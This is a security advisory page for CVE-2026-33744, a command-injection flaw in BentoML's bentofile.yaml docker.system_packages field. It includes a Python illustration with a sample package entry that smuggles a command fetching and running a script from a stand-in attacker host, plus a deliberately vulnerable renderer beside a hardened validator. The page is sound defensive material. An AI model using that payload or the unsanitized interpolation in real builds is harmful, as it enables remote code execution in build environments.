CVE-2026-33744
Published: 27 March 2026
Summary
CVE-2026-33744 is a high-severity Code Injection (CWE-94) vulnerability in BentoML (NVD vendor/product: bentoml/bentoml). Its CVSS base score is 7.8 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Unix Shell (T1059.004). It is ranked at the 0.8th percentile by exploit likelihood (well below the median) and is not currently listed in the CISA KEV catalog, but a public proof-of-concept is referenced.
This vulnerability is AI-related — categorised as Machine Learning Libraries.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): Requires timely remediation of identified flaws, such as patching BentoML to version 1.4.37 or later, which directly fixes the lack of sanitization in the docker.system_packages field.
- SI-10 (Information Input Validation): Mandates input validation at application interfaces like bentoml containerize, rejecting arbitrary strings in docker.system_packages that could enable command injection during Docker builds.
- Enforces restrictions on inputs to configuration files like bentofile.yaml, limiting docker.system_packages to valid OS package names and preventing shell command interpolation.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Command injection into a Dockerfile RUN line via an unsanitized bentofile.yaml enables Unix shell execution (T1059.004) once a user is tricked into processing the malicious config file with bentoml containerize or docker build, which is User Execution: Malicious File (T1204.002).
NVD Description
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.
Deeper analysis
CVE-2026-33744 is a code injection vulnerability (CWE-94, Improper Control of Generation of Code) in BentoML, a Python library for building online serving systems optimized for AI applications and model inference. The generated code in question is a Dockerfile: versions prior to 1.4.37 take the `docker.system_packages` field of `bentofile.yaml`, intended as a list of OS package names, and interpolate each value verbatim into a Dockerfile `RUN` command without sanitization, so a value containing shell metacharacters is executed as shell commands when the image is built. The vulnerability carries a CVSS v3.1 base score of 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
Exploitation requires an attacker to get a malicious `bentofile.yaml` in front of a user who then runs `bentoml containerize` (or `docker build` on the generated Dockerfile), for example by shipping it inside a project or model bundle the victim builds. No privileges are needed, but the attack is local and depends on user interaction, which is what the AV:L and UI:R metrics express. The injected commands run inside the build container with whatever network access, build arguments and mounted secrets that build has, and they can alter the image being produced, so the impact is high on the confidentiality, integrity and availability of the build environment and extends to anything that later deploys the resulting image.
The official BentoML GitHub security advisory (GHSA-jfjg-vc52-wqvf) documents the issue and states that version 1.4.37 resolves it by addressing the lack of sanitization in the `docker.system_packages` field. Security practitioners should upgrade affected deployments to BentoML 1.4.37 or later and, until the upgrade lands, treat a `bentofile.yaml` from an untrusted source as executable input: review its `docker.system_packages` list before building.
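The following added example (written for this page, not BentoML's own code and not the fix shipped in 1.4.37) illustrates the mechanism described in the NVD description and the analysis above. It reconstructs the vulnerable behaviour (values joined verbatim into the RUN line), shows a hardened renderer that restricts the field to Debian-style package names and shell-quotes the result, and exposes the validator separately so it can be used to scan a `bentofile.yaml` before it reaches a build. The package-name pattern, the sample lists and the RUN prefix are assumptions for illustration.

```python
import re
import shlex

# Debian/Ubuntu binary package names (Debian Policy 5.6.1): lowercase letters,
# digits, '+', '-', '.', at least two characters, starting alphanumeric.
# An optional ":arch" qualifier and "=version" pin are allowed, as apt accepts them.
# Assumption for this example: system_packages targets a Debian-based image.
PACKAGE_RE = re.compile(
    r"^[a-z0-9][a-z0-9+.\-]+(?::[a-z0-9-]+)?(?:=[A-Za-z0-9.+~:-]+)?$"
)

# Constructed sample input (not from the advisory): the docker.system_packages
# list of a bentofile.yaml that an attacker controls. The third entry looks
# like a package at a glance but smuggles a shell pipeline.
MALICIOUS_SYSTEM_PACKAGES = [
    "git",
    "libgomp1",
    "curl; curl -s http://attacker.invalid/x.sh | sh",
]

# Constructed benign list, including a version pin a real deployment might use.
BENIGN_SYSTEM_PACKAGES = ["git", "libgomp1", "libssl-dev=3.0.2-0ubuntu1"]

# Assumed shape of the generated Dockerfile line; the real template is not on this page.
APT_PREFIX = "RUN apt-get update && apt-get install -y "


def render_run_vulnerable(packages):
    """Pre-fix behaviour as the advisory describes it (a reconstruction, not
    BentoML's code): each value is interpolated verbatim into the RUN line.
    Docker runs that line through /bin/sh -c inside the build container, so
    everything after the attacker's ';' executes as a separate command."""
    return APT_PREFIX + " ".join(packages)


def find_non_package_values(packages):
    """Detection side: return every entry that is not a plausible package name.
    Run this over a bentofile.yaml from an untrusted source before building."""
    return [
        p for p in packages
        if not isinstance(p, str) or not PACKAGE_RE.fullmatch(p)
    ]


def render_run_hardened(packages):
    """Hardened rendering: reject anything that is not a package name, then
    shell-quote each value so the generated line can only ever name packages.
    Validation is the real control; quoting is defence in depth, since a
    quoted 'curl; ...' string would merely make apt-get fail."""
    bad = find_non_package_values(packages)
    if bad:
        raise ValueError(
            f"docker.system_packages contains non-package values: {bad!r}"
        )
    return APT_PREFIX + " ".join(shlex.quote(p) for p in packages)


if __name__ == "__main__":
    print(render_run_vulnerable(MALICIOUS_SYSTEM_PACKAGES))
    print("suspicious:", find_non_package_values(MALICIOUS_SYSTEM_PACKAGES))
    print(render_run_hardened(BENIGN_SYSTEM_PACKAGES))
    try:
        render_run_hardened(MALICIOUS_SYSTEM_PACKAGES)
    except ValueError as exc:
        print("rejected:", exc)
```

The vulnerable renderer emits a line ending in `... curl; curl -s http://attacker.invalid/x.sh | sh`, which is exactly the data-treated-as-code failure the advisory describes. The hardened path refuses the same list outright, and `find_non_package_values` gives a build pipeline or a pre-commit hook a cheap way to flag such entries in a `bentofile.yaml` before any Docker build runs.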
Details
- CWE(s): CWE-94 (Code Injection)
Affected Products
- BentoML (bentoml/bentoml) prior to 1.4.37; fixed in 1.4.37
AI Security Analysis
- AI Category: Machine Learning Libraries
- Risk Domain: N/A
- OWASP Top 10 for LLMs 2025: None mapped
- Classification Reason: Matched keywords: ai